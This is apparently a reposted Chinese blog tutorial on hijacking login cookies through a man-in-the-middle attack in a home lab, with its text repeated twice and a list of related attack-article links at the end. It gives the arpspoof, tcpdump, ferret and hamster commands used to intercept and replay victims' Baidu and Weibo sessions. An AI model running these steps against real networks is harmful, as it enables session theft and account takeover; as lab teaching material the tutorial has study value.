中间人攻击之劫持登录会话(cookies)
2016-01-23 17:44
627 查看
关于中间人攻击
中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为"中间人"。
因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。
视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws
注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用
关于抓取cookies的手记
要echo下,实现流量的转发,要不目标是上不了网的。
arpspoof 进行arp欺骗
首先抓取包wireshark:选择本地网卡eth0,star抓取流量。
这时候等待用户登录,获取流量信息。获取成功后保存pacp格式。
用ferret加载cookies达到重写流量信息:命令如下:ferret -r chookies.pacp
重写之后生产hamster.txt
这时候运行hamster重放流量,然后代理hettp剩下 的我就不多说了
user。qonze你懂得
0×00
用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 进行ARP欺骗
tcpdump抓去打到本地的数据包
Ferret用来处理抓下来的数据包的
Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。
0×01
拓扑环境:
攻击机:Kali 192.168.1.120
受害机:Windows7 192.168.1.100
网关:192.168.1.1
0×02
我的几个社区帐号都是登录状态,当然未登录也是可以劫持的
先看下我在Kali的机器上是未登录的
0×03
开始arp欺骗
命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
0×04
捕获数据包
命令:tcpdump -i eth0 -w cookie.cap
0×05
模拟受害者登录
受害者在受害机器上就随便刷新一下或者登录一下
完毕
下面我们开始重点
0×06
处理抓去的数据包
ferret -r cookie.cap
自动生成了 hamster.txt
0×07
开启hamster服务
0×08
打开浏览器,使用代理
0×09
打开hamster 浏览器输入http://hamster
选择目标
0x0A
找敏感地址
0x0B
百度劫持成功
微博劫持成功
都成功了
0x0C
我在实验的时候碰见一个问题,就是突然上不到网
下面教大家解决
编辑/etc/NetworkManager/NetworkManager.conf
vi /etc/NetworkManager/NetworkManager.conf
改成true后保存
service network-manager restart
重启服务
中间人攻击(Man-in-the-MiddleAttack,简称"MITM攻击")是一种"间接"的入侵攻击,这种攻击模式是通过各种技术手段将受入侵者控制的一台计算机虚拟放置在网络连接中的两台通信计算机之间,这台计算机就称为"中间人"。
因为FreeBuf几位前辈已经给出了大量的中间人攻击的方法,这里就不再重复了。恰好看到FreeBuf目前没有关于中间人攻击劫持登陆回话的文章,所以就有了下面。
视频下载地址:http://pan.baidu.com/s/1mgicyt6 提取码:o1ws
注:本文提供的攻击测试方法仅供安全学习教学用途,禁止非法使用
关于抓取cookies的手记
要echo下,实现流量的转发,要不目标是上不了网的。
arpspoof 进行arp欺骗
首先抓取包wireshark:选择本地网卡eth0,star抓取流量。
这时候等待用户登录,获取流量信息。获取成功后保存pacp格式。
用ferret加载cookies达到重写流量信息:命令如下:ferret -r chookies.pacp
重写之后生产hamster.txt
这时候运行hamster重放流量,然后代理hettp剩下 的我就不多说了
user。qonze你懂得
0×00
用到的工具是arpspoof tcpdump ferret hamster。
arpspoof 进行ARP欺骗
tcpdump抓去打到本地的数据包
Ferret用来处理抓下来的数据包的
Hamster跟ferret配合使用,提供一个web服务来让我们交互控制。
0×01
拓扑环境:
攻击机:Kali 192.168.1.120
受害机:Windows7 192.168.1.100
网关:192.168.1.1
0×02
我的几个社区帐号都是登录状态,当然未登录也是可以劫持的
先看下我在Kali的机器上是未登录的
0×03
开始arp欺骗
命令:arpspoof -i eth0 -t 192.168.1.1 192.168.1.100
0×04
捕获数据包
命令:tcpdump -i eth0 -w cookie.cap
0×05
模拟受害者登录
受害者在受害机器上就随便刷新一下或者登录一下
完毕
下面我们开始重点
0×06
处理抓去的数据包
ferret -r cookie.cap
自动生成了 hamster.txt
0×07
开启hamster服务
0×08
打开浏览器,使用代理
0×09
打开hamster 浏览器输入http://hamster
选择目标
0x0A
找敏感地址
0x0B
百度劫持成功
微博劫持成功
都成功了
0x0C
我在实验的时候碰见一个问题,就是突然上不到网
下面教大家解决
编辑/etc/NetworkManager/NetworkManager.conf
vi /etc/NetworkManager/NetworkManager.conf
改成true后保存
service network-manager restart
重启服务
相关文章推荐
- 搞定INTEL快速存储技术(用SSD硬盘做缓存加速)
- 中间人攻击-ARP毒化
- 分享上传图片shell的绕过过滤的几种方法
- WiFi安全测试工具WiFiPhisher
- phpcms某处储存型XSS(demo+本地演示)
- windows2003 iis6配置文件和win2008/2012 iis7.5配置文件
- ecshop hash登录 + wordpress mysql盲注字段
- SQLmap简介以及防火墙绕过方法
- 360网站卫士SQL注入绕过案例一个
- 绕过安全狗等一些WAF收集
- 利用kali嗅探周围发送的短信
- 突破变态限制快捷方式提权法
- 安装Kali Linux 后需要做的 20 件事 - 51CTO.COM
- 4、CAS单点登录源码解析之【用户认证】
- 5、CAS单点登录源码解析之【集成新浪腾讯微博】
- 绕过安全狗等一些WAF收集
- 利用kali嗅探周围发送的短信
- 突破变态限制快捷方式提权法
- 安装Kali Linux 后需要做的 20 件事 - 51CTO.COM
- phpcms某处储存型XSS(demo+本地演示)